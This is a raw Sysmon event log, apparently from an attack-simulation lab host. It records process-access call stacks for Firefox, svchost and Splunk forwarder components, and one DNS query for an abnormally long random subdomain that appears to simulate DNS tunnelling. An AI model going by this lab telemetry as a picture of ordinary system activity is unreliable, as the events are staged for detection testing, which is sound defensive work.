Firefox\xul.dll+2fe8b21 10341000x800000000000000018508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.001{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program 
Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.001{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla 
Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.000{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc 
10341000x800000000000000018505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.000{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000018504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.000{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000018503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.999{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla 
Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 22542200x800000000000000018526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.876{59A5CD1D-945A-6005-3305-00000000A301}7052dsafdasfsadfdasdfasdfasdfasdfasfdasadfasfaasdfasdfasdasfdasdfsadfsafasffasdasdfasddafasfdasfasddafasdfasfasdafdasasdfdasd.google.com123-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.529{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.544{59A5CD1D-9505-6005-4E05-00000000A301}67445872C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.391{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:45.389{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.388{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 